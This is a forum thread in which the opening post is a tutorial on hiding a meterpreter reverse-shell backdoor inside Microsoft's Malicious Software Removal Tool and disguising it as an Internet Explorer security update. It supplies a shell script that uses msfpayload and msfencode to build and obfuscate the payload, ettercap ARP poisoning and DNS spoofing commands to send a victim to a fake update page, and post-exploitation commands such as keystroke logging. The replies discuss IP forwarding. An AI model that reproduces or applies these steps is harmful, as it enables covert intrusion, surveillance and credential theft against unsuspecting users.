Results 1 to 6 of 6

Thread: covering up a meterpreter backdoor

  1. #1
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default covering up a meterpreter backdoor

    Hi everybody,

    Here is a tutorial on how to create an undetectible meterpreter backdoor and cover it up as an internet explorer security update. I created a very basic script that creates the meterpreter backdoor and starts the multi/handler.
    I will inject the payload into the Microsoft Windows Malicious Software Removal Tool wich is available for download here.

    Download details: Microsoft« Windows« Malicious Software Removal Tool (KB890830)

    And I will use ettercap to dns_spoof the victim to the fake internet explorer security update page.

    Save my script as myscript.sh:
    Code:
    #!/bin/sh
    clear
    cd /pentest/exploits/framework3
    echo "*************************************"
    echo "              creating a meterpreter backdoor          "
    echo "*************************************"
    echo -n "lhost ?"
    read lhost
    echo -n "lport?"
    read lport 
    echo -n "path to output file?"
    read filename
    echo -n "path to input file?"
    read originalfile
    echo "creating payload ..."
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
    echo "payload created !"
    echo "starting multi/handler ..."
    ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
    Make my script executable:

    Code:
    chmod 755 myscript.sh
    Run my script:

    Code:
    ./myscript.sh
    lhost => your ip
    lport => 5555
    output => /root/backdoor.exe
    input => /root/windows-kb890830-v3.12
    Set up portforwarding:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Set up etter.dns located in /usr/share/ettercap

    Code:
    nano /usr/share/ettercap/etter.dns
    Remove the part where microsoft is forwarded to linux and add these lines:

    Code:
    * A your ip
    *.* A your ip
    *.*.* A your ip
    *.*.*.* A your ip
    Create a webpage where you can download the file from or send me a message and I will send you my webpage.

    I used photoshop to edit some pictures I found regarding internet explorer,
    I created a very simple html page, added a css style sheet to position the download button
    and to make the webpage look the same with every screen resolution.

    Copy all the files into your /var/www/ directory.
    Restart apache:

    Code:
    /etc/init.d/apache2 restart
    Activate the dns spoofing:

    Code:
    ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /victim ip/ /gateway ip/
    Gateway ip can be found by typing this from the terminal:

    Code:
    route -n
    Now we just have to wait for our victim to run the backdoor. When the victim runs the backdoor you should see something like "session 1 opened". You can see your active sessions by typing:

    Code:
    sessions -r
    You can jump into the first session by typing:
    Code:
    sessions -i 1
    Now there are a lot of commands you are able to execute. You can see them all by typing:
    Code:
    help
    A few examples:

    Code:
    sysinfo => get system info
    shell => jump into a cmd shell
    keyscan_start => scan for keyboard input
    keyscan_dump => dump keyboard input
    keyscan_stop => stop scanning
    screenshot => take screenshot
    upload
    download
    Last edited by LHYX1; 11-08-2010 at 07:19 PM.

  2. #2
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: covering up a meterpreter backdoor

    Good tut..jst one thing..

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    isnt the packet forwardng not portforwarding?

  3. #3
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: covering up a meterpreter backdoor

    I think "echo 1 > /proc/sys/net/ipv4/ip_forward" actually enables portforwarding.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: covering up a meterpreter backdoor

    The /etc/sysctl.conf file
    Code:
    #
    # /etc/sysctl.conf - Configuration file for setting system variables
    # See sysctl.conf (5) for information.
    #
    
    #kernel.domainname = example.com
    #net/ipv4/icmp_echo_ignore_broadcasts=1
    
    # the following stops low-level messages on console
    kernel.printk = 4 4 1 7
    
    ##############################################################3
    # Functions previously found in netbase
    #
    
    # Uncomment the next line to enable Spoof protection (reverse-path filter)
    #net.ipv4.conf.default.rp_filter=1
    
    # Uncomment the next line to enable TCP/IP SYN cookies
    #net.ipv4.tcp_syncookies=1
    
    # Uncomment the next line to enable packet forwarding for IPv4
    net.ipv4.conf.default.forwarding=1
    
    # Uncomment the next line to enable packet forwarding for IPv6
    #net.ipv6.conf.default.forwarding=1
    The last paragraph says packetforwarding..if this parameter is changed then we dont have to do
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    again
    So doesnt that mean its packet forwarding?
    Also if you are pentesting within a LAN you dont need portforwarding right?

  5. #5
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: covering up a meterpreter backdoor

    yes you are probably right. You forward the packtes from the victim to the router so it probably is packetforwarding. But i have followed some tutorials myself about arp poisoning and in most tutorials they say if arp poisoning doesn't work you should try typing "echo 1 > /net/proc/sys/ipv4/ip_forward".
    So I don't realy know the reason for using this command in a LAN. Like you say, you normally only use portforwarding if you are running servers behind a NAT or something like that.

  6. #6
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: covering up a meterpreter backdoor

    I think what we are telling iptables not to drop packets that are'nt meant for us. If we dont echo 1 > /proc/sys/net/ipv4/ip_forward, then iptables takes a look at the ip packet, sees an ip different from ours and so drops it.

Similar Threads

  1. Getting Meterpreter Backdoor around AVG AV
    By ballzan in forum Beginners Forum
    Replies: 18
    Last Post: 12-15-2010, 01:00 AM
  2. error when installing meterpreter backdoor (metsvc)
    By mia_tech in forum Beginners Forum
    Replies: 1
    Last Post: 08-24-2010, 08:58 AM
  3. metsvc / meterpreter backdoor - password protecting?
    By MrWWW in forum Beginners Forum
    Replies: 0
    Last Post: 05-08-2010, 09:20 AM
  4. Opening backdoor after getting meterpreter session
    By kazalku in forum OLD Pentesting
    Replies: 44
    Last Post: 01-21-2010, 10:27 PM
  5. covering traces
    By elninio in forum OLD Newbie Area
    Replies: 5
    Last Post: 10-16-2008, 11:08 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •